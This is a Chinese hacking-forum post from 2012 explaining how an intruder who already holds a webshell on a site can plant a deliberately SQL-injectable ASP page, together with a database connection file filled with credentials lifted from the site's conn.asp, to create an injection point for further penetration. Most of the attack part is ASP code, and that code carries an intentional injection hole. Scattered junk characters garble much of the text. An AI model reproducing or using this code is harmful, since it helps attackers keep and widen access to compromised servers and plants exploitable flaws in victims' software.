找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1962|回复: 0
打印 上一主题 下一主题

自己构造注入点方便入侵

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 17:27:31 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
自己构造注入点方便入侵
4 r# m0 r2 E7 n$ P, Q/ [2 M  N& K& U: ^$ P! J3 G
今天看了rootkit论坛里面有人要我写出来关于伪造一个注入点,然后方便渗透,找到更多的可利用的信息+ `4 ]# u2 Z8 E. G% R) w( Z8 g3 U
  {, o. W# Z* G; i
这两天一直考试,想了下,就先仍出来,有什么问题可以提出来,我们一起讨论!) e$ H1 [5 m; q# D# e, X
2 ]$ R4 o' [' d7 O4 ~% R9 q
首先你要拿了一个webshell,这样你找到连接数据库的文件,大多都是conn.asp这个文件里面有mssql的用户和0 F. G' ~4 I( z- ~% t  s9 ^
$ d0 `9 ?1 a' A2 c  K2 ~
密码,你要找到用户名、密码、数据库所在的IP,然后连接上去,至于连接大家应该都会,找到网站管理员的表
* Z& w0 ?5 L" L
- `8 `$ H" u  [4 E! c因为我测试的时候是用管理员的表,我朋友说任何表名都可以,只要这个表存在,代码如下:
4 ~. v: A* s2 p6 T- t! y' k2 \1 K, Q4 A- M9 @5 t0 F: R/ F
程序代码
9 ]. P0 B+ f4 F2 u/ V- N<!--#include file="xx.asp"-->
% d& o' P& |( g$ T, o1 U% S<%, U0 [$ R) {$ b2 B/ y2 q
set rs=server.createobject("ADODB.recordset")' m$ e. [- R7 T+ r1 I
id = request("id")
4 _( w, I/ B7 N/ L4 [* T- tstrSQL = "select * from admin where id=" & id$ A! K* D) ?) e# u* x* e& N8 Q# b
rs.open strSQL,conn,1,3
! l! `1 f7 _: O  M% q  ~4 zrs.close
2 z8 A" m1 Y& @. X, r% J$ ]%>
4 U9 y7 L7 r8 {; j; o( c7 f; G, Y4 w0 {, Y, Y; k$ T
把strSQL = "select * from admin where id=" & id 这句话里面的admin换成要伪造的表名,注意必须存在1 S4 k- J- N; L( q+ ^. Z' R2 t

- u7 W& K( B) q0 U3 U) G; ?: u: l你可以连接上去看下表名就是了!这里假设的是admin是表名!这个文件名随便保存!
7 v' H3 O9 e$ k
. h5 ?7 v* x% E$ k) t1 y然后就要构造一个连接数据库的文件了,代码如下:
9 O+ X& `! v3 Z程序代码  z1 \3 C' R4 Q7 ^5 Z
<%        
3 U" b* ~0 D) T( \% A  IstrSQLServerName = "000.000.000.000"     '服务器名称或地址
7 P/ r8 z9 a6 V. o- gstrSQLDBUserName = "sqlname"         '数据库帐号( ]$ {8 t9 k8 z2 z+ G+ D# R+ m
strSQLDBPassword = "sqlpass"         '数据库密码5 K( k: s8 J' x3 a2 a% h/ I
strSQLDBName = "sqldataname"           '数据库名称- d& Y4 R0 {1 V, E
Set conn = Server.CreateObject("ADODB.Connection")( |, @5 I: p( ~- A3 F
strCon = "rovider=SQLOLEDB.1ersist Security Info=False;Server=" & strSQLServerName & ";User ID=" & strSQLDBUserName & "assword=" & strSQLDBPassword & ";Database=" & strSQLDBName & ";"
3 q5 A8 n# A; e. G0 b7 {conn.open strCon+ A) ^. p6 H7 \- j$ h' ~
%>
- m( {+ |* }+ q. O4 y) }& g  H0 Z
9 C; t9 \# G( x这里应该都会了,就不罗嗦了,不过注意的是保存的文件名要和include调用的名字一样。。还是罗嗦话,; x/ f* h* }8 z; A4 ^" ]8 q
' e- f* v4 ?( R$ O
就这样,正常情况下,就OK了,伪造成功……0 c$ `/ `$ p# Q, l( k# G5 P

6 i( k  L3 C# M' S           如果有什么问题可以提出来大家一起探讨解决。
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表